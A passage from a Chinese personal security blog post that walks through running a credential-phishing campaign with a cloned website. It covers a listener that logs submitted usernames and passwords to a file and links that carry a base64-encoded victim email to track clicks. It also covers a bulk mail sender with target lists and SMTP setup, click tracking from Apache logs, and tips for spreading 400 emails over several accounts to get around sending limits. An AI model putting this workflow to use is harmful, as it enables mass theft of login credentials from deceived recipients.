<h2 id="监听配置"><a href="#监听配置" class="headerlink" title="监听配置"></a>监听配置</h2><p>本来到这步想着写文章把效果整完美点，研究了下是用FontClass的方式，不过还是没成功，接着往下写吧</p>
<p>运行大佬给的pyc文件，pyc文件是由py文件经过编译后生成的文件，看不到明文内容，后面跟的数字就是要求的版本，比如这下面给的pyc文件就只能py37能运行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">00.http_data_flask.cpython-37.pyc		&#x2F;&#x2F;克隆服务器监听，9888端口就这个文件开启的</span><br><span class="line">access_logv2.1.1.cpython-37.pyc			&#x2F;&#x2F;日志分析</span><br><span class="line">emali_sendsv2.1.cpython-37.pyc			&#x2F;&#x2F;邮件发送</span><br></pre></td></tr></table></figure>



<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip3 install flask</span><br></pre></td></tr></table></figure>

<p>运行00.http_data_flask.cpython-37.pyc后直接登录会返回500，要符合特定格式的url才可以</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;192.168.16.243&#x2F;index.html?id&#x3D;b%27YWE&#x3D;%27&amp;aa  &#x2F;&#x2F;第一个参数中间是base64加密的，这个base64将是经过加密的邮箱地址，用于记录点击，第二个是标签，这些会有邮件来设定，邮件发送的钓鱼链接也是这样的格式</span><br></pre></td></tr></table></figure>

<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127144904924.png" alt="image-20220127144904924"></p>
<p>这样才算成功钓鱼</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127145139373.png" alt="image-20220127145139373"></p>
<p>并没有登录成功，只是一个提示。然后00.http_data_flask.cpython-37.pyc所在目录下会生成一个login.log文件，里面记录了登录的账密。这个是密码md5版，也有非md5版的。</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127145309954.png" alt="image-20220127145309954"></p>
<h2 id="邮件配置"><a href="#邮件配置" class="headerlink" title="邮件配置"></a>邮件配置</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip3 install PyEmail</span><br></pre></td></tr></table></figure>

<p>邮件脚本包含以下内容</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127145831519.png" alt="image-20220127145831519"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">emali_sendsv2.0.cpython-37.pyc 邮件发送程序</span><br><span class="line">mail.json 邮件发送程序相关配置</span><br><span class="line">mail_body.txt 邮件内容正⽂</span><br><span class="line">mail_sign.txt 邮件签名</span><br><span class="line">targetmail_list.txt 收件箱列表</span><br><span class="line">sends_error.txt 发送出错邮箱列表</span><br><span class="line">sends_success.txt 发送成功邮箱列表</span><br></pre></td></tr></table></figure>



<p>邮件正文mail_body.txt</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127150203229.png" alt="image-20220127150203229"></p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127150219159.png" alt="image-20220127150219159"></p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127171758765.png" alt="image-20220127171758765"></p>
<p>收件箱列表targetmail_list.txt。sends_error.txt和sends_success.txt和该文件类似，发送成功邮件会在sends_success.txt显示。发送失败邮件会在sends_error.txt显示。</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127150332232.png" alt="image-20220127150332232"></p>
<p>邮件签名mail_sign.txt</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127150901171.png" alt="image-20220127150901171"></p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127150912662.png" alt="image-20220127150912662"></p>
<p>发邮件账户配置文件mail.json，要开启自己163邮箱smtp那啥，会给一个码，就是配置文件里面的PWD</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127152526542.png" alt="image-20220127152526542"></p>
<p>最终效果</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127152703069.png" alt="image-20220127152703069"></p>
<h2 id="日志分析"><a href="#日志分析" class="headerlink" title="日志分析"></a>日志分析</h2><p>apache开启日志记录，找到日志文件access_log，运行pyc文件，生成linkclick.log文件，里面就是点击记录。</p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127152908000.png" alt="image-20220127152908000"></p>
<p><img src="/../../../../images/%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86%E9%92%93%E8%B4%A6%E5%AF%86/image-20220127153005051.png" alt="image-20220127153005051"></p>
<h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">用163发的邮件,比如发50封邮件，每发第9封时邮件系统会自动等待1分钟再发。测试时发了400封，准备了3个邮箱发。</span><br><span class="line">建议把自己邮箱写target第一个。</span><br><span class="line">会有不少退信。</span><br></pre></td></tr></table></figure>



<p>本来还能再细写点，尼玛的太难了，都1.27了还被程序员拉去对线。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E9%92%93%E9%B1%BC/" rel="tag"># 钓鱼</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/01/19/log4j2%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" rel="prev" title="log4j2代码执行漏洞">
      <i class="fa fa-chevron-left"></i> log4j2代码执行漏洞
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BD%91%E7%AB%99%E5%85%8B%E9%9A%86"><span class="nav-number">1.</span> <span class="nav-text">网站克隆</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9%E6%95%B0%E6%8D%AE%E6%8E%A5%E6%94%B6%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="nav-number">1.1.</span> <span class="nav-text">修改数据接收服务器</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A2%9E%E5%8A%A0%E4%BC%A0%E8%BE%93%E5%8F%82%E6%95%B0"><span class="nav-number">1.2.</span> <span class="nav-text">增加传输参数</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9B%91%E5%90%AC%E9%85%8D%E7%BD%AE"><span class="nav-number">2.</span> <span class="nav-text">监听配置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%82%AE%E4%BB%B6%E9%85%8D%E7%BD%AE"><span class="nav-number">3.</span> <span class="nav-text">邮件配置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90"><span class="nav-number">4.</span> <span class="nav-text">日志分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%85%B6%E4%BB%96"><span class="nav-number">5.</span> <span class="nav-text">其他</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="thedog"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">thedog</p>
  <div class="site-description" itemprop="description">笑一个</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://steamcommunity.com/profiles/76561198347024263/" title="steam → https:&#x2F;&#x2F;steamcommunity.com&#x2F;profiles&#x2F;76561198347024263&#x2F;" rel="noopener" target="_blank"><i class="fab fa-steam fa-fw"></i>steam</a>
      </span>
  </div>



      </div>


<script type="text/javascript" charset="utf-8" src="/js/tagcloud.js"></script>
<script type="text/javascript" charset="utf-8" src="/js/tagcanvas.js"></script>
<div class="widget-wrap">
    <div id="myCanvasContainer" class="widget tagcloud">
        <canvas width="250" height="250" id="resCanvas" style="width=100%">
            <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/app/" rel="tag">app</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/cve-2020-1472/" rel="tag">cve-2020-1472</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%B8%8A%E7%BA%BF%E6%96%B9%E5%BC%8F/" rel="tag">上线方式</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%85%8D%E6%9D%80%E6%B5%8B%E8%AF%95/" rel="tag">免杀测试</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/" rel="tag">域渗透</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%8F%90%E6%9D%83/" rel="tag">提权</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%91%84%E5%83%8F%E5%A4%B4/" rel="tag">摄像头</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a><span class="tag-list-count">6</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%A1%AC%E4%BB%B6/" rel="tag">硬件</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%80%83%E8%AF%81/" rel="tag">考证</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%84%9A%E6%9C%AC%E7%BC%96%E5%86%99/" rel="tag">脚本编写</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%92%93%E9%B1%BC/" rel="tag">钓鱼</a><span class="tag-list-count">2</span></li></ul>
        </canvas>
    </div>
</div>


    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">thedog</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  




  
<script src="/js/local-search.js"></script>













    <div id="pjax">
  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'Q9yIHCeu9YgeOBK4PDlf45fD-gzGzoHsz',
      appKey     : 'Ny4HdnMmkjlvgFBeGiA6Hgor',
      placeholder: "吱一声",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

    </div>
</body>
</html>
